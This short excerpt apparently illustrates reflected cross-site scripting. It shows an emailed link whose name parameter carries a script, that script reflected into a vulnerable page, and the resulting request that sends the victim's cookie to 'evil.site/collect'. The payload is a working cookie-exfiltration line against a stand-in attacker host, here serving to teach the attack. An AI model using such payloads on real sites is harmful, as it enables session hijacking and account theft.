(inside email/HTML link):
....
http://www.vulnerable.site/welcome?name=
<script>window.open(“http://www.evil.site/
collect?cookie=”%2Bdocument.cookie)
</script>
<HTML>
...
Hi <script>window.open(“http://www.
evil.site/collect?cookie=“+document.
cookie)</script><BR>
GET /collect?cookie=ID=12345
HTTP/1.0